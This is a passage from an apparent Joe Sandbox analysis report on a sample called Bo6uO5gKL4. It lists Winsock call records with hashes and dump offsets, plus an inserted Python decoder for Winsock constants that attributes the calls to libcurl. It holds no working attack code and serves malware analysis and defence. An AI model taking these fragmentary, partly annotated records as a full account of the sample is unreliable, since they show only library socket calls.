                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Ioctlsetsockopt
                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                      • API String ID: 1903391676-2691795271
                                      • Opcode ID: 11ba16d1454d6866825277f88367f0dd953c0de9f943dc7f0b0a8cb0a568c869
                                      • Instruction ID: c8ed6164d97498c08c6ce28f32f47cbe63bf3d778302d703d068fba3ea7afb10
                                      • Opcode Fuzzy Hash: 11ba16d1454d6866825277f88367f0dd953c0de9f943dc7f0b0a8cb0a568c869
                                      • Instruction Fuzzy Hash: 7A51D070604305AFDB11DF24C885FAABBA5FF88314F148528FE589B292E770F991CB91

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 587770-587832. Imported API call: recv (block 5877b6-5877c2). Internal calls: 5872a0, 58cb20, 908c50.
                                      APIs
                                      Strings
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: recv
                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                      • API String ID: 1507349165-640788491
                                      • Opcode ID: ec2b39f1d01e6c95211e9bb954de79b0569316fc87d6522c43dd2b752ef13d14
                                      • Instruction ID: 8218dc239c9c34482109caa8f557acd35b02df2a9add37a8c201e72f169070d8
                                      • Opcode Fuzzy Hash: ec2b39f1d01e6c95211e9bb954de79b0569316fc87d6522c43dd2b752ef13d14
                                      • Instruction Fuzzy Hash: 63110BB56053086BE110AA10EC4AF3B7F9CEBCAB64F540568BC0472252D661DC00C7B1

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 5875e0-587699. Imported API call: socket (block 587607-587629). Internal calls: 5872a0, 58cb20, 908c50.
                                      APIs
                                      Strings
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                      • API String ID: 98920635-842387772
                                      • Opcode ID: d301a8f9cd78d138b2d71510e6638aa322811857ca827afd3fd3d48162b618cb
                                      • Instruction ID: ac8abe26a51187422cbf5a01a01d3fad75403a599f71e45645d299ec01c13376
                                      • Opcode Fuzzy Hash: d301a8f9cd78d138b2d71510e6638aa322811857ca827afd3fd3d48162b618cb
                                      • Instruction Fuzzy Hash: 3011297260561227D6116A69EC07F5B3FD8FBC6734F540964F814B62E2D721C851C3E1

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 908e90-908f5e, with the function continuing in a second region at a599b0-a59a72. Imported API call: _open (block 908e90-908eb8). Internal calls: 909f70, 908d20, 908ca8, 908cc0.
                                      APIs
                                      Strings
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: _open
                                      • String ID: terminated$@
                                      • API String ID: 4183159743-3016906910
                                      • Opcode ID: b20d9a80916659d3509ab60544edef00fe2388337dba2685de5757261b0199f1
                                      • Instruction ID: 995a92ee8e807eba5f32537791bf045f863bf6b62dc8b4d4c65ea4915c29cfaf
                                      • Opcode Fuzzy Hash: b20d9a80916659d3509ab60544edef00fe2388337dba2685de5757261b0199f1
                                      • Instruction Fuzzy Hash: 884127B0A08205DEDB10EF79C4447AFBAE4AB85358F108A2DE998D7391EB74D8058B56

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 5ba150-5ba250. Imported API call: getsockname (block 5ba181-5ba1ce). Internal calls: 59d090, 5bef30, 5c4f40.
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 005BA1C7
                                      Strings
                                      • getsockname() failed with errno %d: %s, xrefs: 005BA1F0
                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 005BA23B
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                      • API String ID: 3358416759-2605427207
                                      • Opcode ID: a26b4a05856a6a87a2cd50589a64e60d7bb4f6ce18c5c80188c015ee61f79edb
                                      • Instruction ID: 43520e11554166bdb71d7df9dbb59d87651682e841e89792d52208d7163c346f
                                      • Opcode Fuzzy Hash: a26b4a05856a6a87a2cd50589a64e60d7bb4f6ce18c5c80188c015ee61f79edb
                                      • Instruction Fuzzy Hash: 5B21F671808680BAE6259B28DC47FE6B7BCEFD1328F040654F99853151FF32698586E2

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 59d5e0-59d68d. Imported API call: WSAStartup (block 59d652-59d662). Internal calls: 59d690, 5a7620.
                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 0059D65B
                                      Strings
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID: if_nametoindex$iphlpapi.dll
                                      • API String ID: 724789610-3097795196
                                      • Opcode ID: c871e0a7100b43af080efcea538c1292d008533ede14e4e7b7513e1a55c22645
                                      • Instruction ID: 69be5502a407fb7507fcfa341477dac70f5cb5fc84ab9864aadb7b4779fa89e2
                                      • Opcode Fuzzy Hash: c871e0a7100b43af080efcea538c1292d008533ede14e4e7b7513e1a55c22645
                                      • Instruction Fuzzy Hash: D501DBE0D4034246FF116738DD1B76A2DF07B91704F491969DC8C961D2FB69C558C2A3

                                       Control-flow Graph

                                       • Rendered graph not reproduced here; the executed/not-executed colouring is not recoverable from the text. Basic blocks 64aa30-64af1f. Imported API calls: socket (block 64ab96-64abab), ioctlsocket (block 64abd0-64abed), connect (block 64ada0-64adb2; connect is present in the graph but missing from the APIs list of this record). Internal calls: 63e730, 63ea60, 63ebf0, 64af70, 63e760, 63e7c0, 63e180.
                                      APIs
                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0064AB9B
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0064ABE4
                                       Memory Dump Source
                                       • Same source dump and associated dumps as the first function above (Offset: 00580000, based on PE: true)
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ioctlsocketsocket
                                      • String ID:
                                      • API String ID: 416004797-0
                                      • Opcode ID: a48af1f23df6d63322a42610c66a6933f43bb1fc3f03c0841fcbfff3228c215e
                                      • Instruction ID: b0894ee7dcd09d9471dc26a308303aa52b8e26f05eccdc42f3fbbb7cbb829aed
                                      • Opcode Fuzzy Hash: a48af1f23df6d63322a42610c66a6933f43bb1fc3f03c0841fcbfff3228c215e
                                      • Instruction Fuzzy Hash: 43E1E170644302AFEB20CF94C885BABB7E6EF85304F144A2CF9988B391D775D944DB92
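The records above print the Winsock arguments only as raw hex: WSAIoctl with control code 4004747B, setsockopt with level 0000FFFF and option 00001001, ioctlsocket with 8004667E, and WSAStartup with 00000202. The decoder below is an added example written for this page; it is not code from the Joe Sandbox report or from the analysed sample. It re-implements the bit layout of the winsock2.h _IO/_IOR/_IOW and _WSAIO* macros so that a control code can be split into direction, group, number and argument size, and then names the constants through small lookup tables. Those tables are an assumption limited to a handful of well-known codes; the constants fed to the decoder at the bottom are copied from the report's API lines.

```python
"""Decode raw Winsock constants as printed in sandbox API-call lines.

Added example for this page, not code from the Joe Sandbox report or from
the analysed sample. It re-implements the bit layout of the winsock2.h
_IO/_IOR/_IOW macros (BSD-style codes) and the _WSAIO* macros (Winsock 2
codes with a group selector), then names the constants seen in the report.
The name tables are an assumption: they list only well-known codes.
"""
from dataclasses import dataclass

# Direction bits (bits 31..29) shared by both macro families.
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT
IOCPARM_MASK = 0x7F            # argument-size field, bits 22..16
# Group selectors of the _WSAIO* family, bits 28..27.
IOC_WS2, IOC_PROTOCOL, IOC_VENDOR = 0x08000000, 0x10000000, 0x18000000


def _io(group: str, num: int) -> int:                 # _IO(x, y)
    return IOC_VOID | (ord(group) << 8) | num


def _ior(group: str, num: int, size: int) -> int:     # _IOR(x, y, t)
    return IOC_OUT | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def _iow(group: str, num: int, size: int) -> int:     # _IOW(x, y, t)
    return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


def _wsaio(direction: int, selector: int, num: int) -> int:  # _WSAIO{,R,W,RW}
    return direction | selector | num


# Computed from the macro definitions rather than pasted as hex, so the table
# cannot silently carry a mistyped literal.
IOCTL_NAMES = {
    _iow("f", 126, 4): "FIONBIO",                       # 0x8004667E
    _ior("f", 127, 4): "FIONREAD",                      # 0x4004667F
    _ior("s", 7, 4): "SIOCATMARK",                      # 0x40047307
    _ior("t", 123, 4): "SIO_IDEAL_SEND_BACKLOG_QUERY",  # 0x4004747B
    _wsaio(IOC_INOUT, IOC_WS2, 6): "SIO_GET_EXTENSION_FUNCTION_POINTER",  # 0xC8000006
    _wsaio(IOC_IN, IOC_VENDOR, 1): "SIO_RCVALL",        # 0x98000001
    _wsaio(IOC_IN, IOC_VENDOR, 4): "SIO_KEEPALIVE_VALS",  # 0x98000004
}

SOL_SOCKET, IPPROTO_TCP = 0xFFFF, 6
SOCKOPT_NAMES = {
    (SOL_SOCKET, 0x0004): "SO_REUSEADDR",
    (SOL_SOCKET, 0x0008): "SO_KEEPALIVE",
    (SOL_SOCKET, 0x0080): "SO_LINGER",
    (SOL_SOCKET, 0x1001): "SO_SNDBUF",
    (SOL_SOCKET, 0x1002): "SO_RCVBUF",
    (SOL_SOCKET, 0x1005): "SO_SNDTIMEO",
    (SOL_SOCKET, 0x1006): "SO_RCVTIMEO",
    (IPPROTO_TCP, 0x0001): "TCP_NODELAY",
}
LEVEL_NAMES = {SOL_SOCKET: "SOL_SOCKET", IPPROTO_TCP: "IPPROTO_TCP"}


@dataclass(frozen=True)
class Ioctl:
    code: int
    direction: str   # "IN", "OUT", "INOUT" or "VOID"
    group: str       # group character, or the _WSAIO selector name
    number: int
    arg_size: int    # 0 for _WSAIO codes, which carry no size field
    name: str        # symbolic name, or "unknown"


def decode_ioctl(code: int) -> Ioctl:
    """Split a 32-bit Winsock control code into its fields."""
    code &= 0xFFFFFFFF
    direction = {IOC_IN: "IN", IOC_OUT: "OUT", IOC_INOUT: "INOUT",
                 IOC_VOID: "VOID"}.get(code & 0xE0000000, "?")
    selector = code & 0x18000000
    if selector:     # _WSAIO family: selector present, no size/group-char fields
        group = {IOC_WS2: "IOC_WS2", IOC_PROTOCOL: "IOC_PROTOCOL",
                 IOC_VENDOR: "IOC_VENDOR"}[selector]
        number, size = code & 0x00FFFFFF, 0
    else:            # BSD-style _IO/_IOR/_IOW code
        group = chr((code >> 8) & 0xFF)
        number, size = code & 0xFF, (code >> 16) & IOCPARM_MASK
    return Ioctl(code, direction, group, number, size, IOCTL_NAMES.get(code, "unknown"))


def decode_sockopt(level: int, optname: int) -> str:
    """Name a setsockopt/getsockopt (level, optname) pair, e.g. SOL_SOCKET/SO_SNDBUF."""
    lvl = LEVEL_NAMES.get(level, hex(level))
    opt = SOCKOPT_NAMES.get((level, optname), hex(optname))
    return f"{lvl}/{opt}"


def wsa_version(requested: int) -> tuple:
    """WSAStartup's wVersionRequested is MAKEWORD(major, minor): low byte is major."""
    return (requested & 0xFF, (requested >> 8) & 0xFF)


# Constants copied from the report's API lines (hex exactly as the sandbox printed it).
REPORT_IOCTLS = [("WSAIoctl", 0x4004747B), ("ioctlsocket", 0x8004667E)]

if __name__ == "__main__":
    for api, code in REPORT_IOCTLS:
        i = decode_ioctl(code)
        print(f"{api}(0x{code:08X}) -> {i.name}: dir={i.direction} group={i.group!r} "
              f"num={i.number} size={i.arg_size}")
    print("setsockopt(0xFFFF, 0x1001) ->", decode_sockopt(0xFFFF, 0x1001))
    print("WSAStartup(0x0202) -> version %d.%d" % wsa_version(0x0202))
```

Read against the records: WSAIoctl(SIO_IDEAL_SEND_BACKLOG_QUERY) immediately followed by setsockopt(SOL_SOCKET, SO_SNDBUF) is the standard Windows pattern for growing the send buffer to the ideal backlog; ioctlsocket(FIONBIO, 1) before connect makes the socket non-blocking so the connect can be polled; WSAStartup(0x0202) requests Winsock 2.2. The source-file names in the String IDs (cf-socket.c, multi.c) and the "SEND %s:%d send(%lu) = %ld" / "FD %s:%d socket() = %d" strings match libcurl's lib/cf-socket.c, lib/multi.c and lib/memdebug.c, so these socket records most likely belong to a statically linked libcurl rather than to hand-written networking code; when hunting for sample-specific behaviour, treat them as library code and look instead at the callers that supply the URLs and payloads.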
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID: FD %s:%d sclose(%d)
                                      • API String ID: 2781271927-3116021458
                                      • Opcode ID: edecbc091442c7b2ea263d796b6072f84243c5391cd227a3a23ae08984b50e98
                                      • Instruction ID: be3115b4872fb4811e1f5a98f0bfa962d6e74578991c354bd23b2c4e7a6720b1
                                      • Opcode Fuzzy Hash: edecbc091442c7b2ea263d796b6072f84243c5391cd227a3a23ae08984b50e98
                                      • Instruction Fuzzy Hash: 8DD05E32A096322B852069597C4DC5BAFA8EECAF70B060CA8FD4077201E220DD0087E2
                                      APIs
                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0064B29E,?,00000000,?,?), ref: 0064B0BA
                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00633C41,00000000), ref: 0064B0C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnect
                                      • String ID:
                                      • API String ID: 374722065-0
                                      • Opcode ID: d138ab3a2bef88ffbb1399474130b44be52afcb61e95c336de4a738f8e6fa514
                                      • Instruction ID: 3896e9d98ca5d30fac5d07afc9d202170ae92491ffc5c1c26d57ccfafd1c55e5
                                      • Opcode Fuzzy Hash: d138ab3a2bef88ffbb1399474130b44be52afcb61e95c336de4a738f8e6fa514
                                      • Instruction Fuzzy Hash: 1A01D8363042009BCB205A78DC44FABB39BFF89765F040754F978932D1D726ED508751
                                      APIs
                                      • gethostname.WS2_32(00000000,00000040), ref: 00634AA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: gethostname
                                      • String ID:
                                      • API String ID: 144339138-0
                                      • Opcode ID: c4380b07d40da6f9fdfc22197cca161ef7267a28bbd3b3e30085a45231351c62
                                      • Instruction ID: d4d737dd088457bf032e3d8d773207eacca2269cefa115f22d6e6235d784262c
                                      • Opcode Fuzzy Hash: c4380b07d40da6f9fdfc22197cca161ef7267a28bbd3b3e30085a45231351c62
                                      • Instruction Fuzzy Hash: 9351CC70A047008BE7309B25DD497A7F6E6AF41319F04193CE98A867E1EF75F844CB92
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 0064AFD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID:
                                      • API String ID: 3358416759-0
                                      • Opcode ID: 2498009bbd1d022ef20e9f805327fd63ae915ea12c1d699a52295f1e556689a5
                                      • Instruction ID: e3ad834c82cd89ed3b34f064428c1adcb93305cddd30bc6706e3ca8ff56c6617
                                      • Opcode Fuzzy Hash: 2498009bbd1d022ef20e9f805327fd63ae915ea12c1d699a52295f1e556689a5
                                      • Instruction Fuzzy Hash: 9B116670848785A5EB268F59D8027E6B3F4EFD0329F109619E59942150F7729ACA8BC2
                                      APIs
                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0064A97F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: a01dae3757f71d297d8baf0fb4ea23d3e86d737b2eca6983d66a66948d89c869
                                      • Instruction ID: 8f9a236dcfaeceecf1e6dd6ab9fe464554b767fc4fe04a2e3c6a49a44ad1e148
                                      • Opcode Fuzzy Hash: a01dae3757f71d297d8baf0fb4ea23d3e86d737b2eca6983d66a66948d89c869
                                      • Instruction Fuzzy Hash: AE01A2B6B10710AFC7148F55DC85B96B7A5EF84721F06865DEA982B361C331AC108BE1
                                      APIs
                                      • socket.WS2_32(?,0064B280,00000000,-00000001,00000000,0064B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0064AF67
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID:
                                      • API String ID: 98920635-0
                                      • Opcode ID: e1c5c366df3772df933ab935e18b37ba424da909f787789ef88cfedc2047e619
                                      • Instruction ID: 93541386cb3a6a066cc11876078c07e564ee6363cf53562212d20adea88f5e6b
                                      • Opcode Fuzzy Hash: e1c5c366df3772df933ab935e18b37ba424da909f787789ef88cfedc2047e619
                                      • Instruction Fuzzy Hash: 87E0EDB6A092216BD654DA58E8449EBF36EEFC4B20F055A49B85467304C730AC558BE2
                                      APIs
                                      • closesocket.WS2_32(?,00649422,?,?,?,?,?,?,?,?,?,?,?,w3c,00A5C880,00000000), ref: 0064B04D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
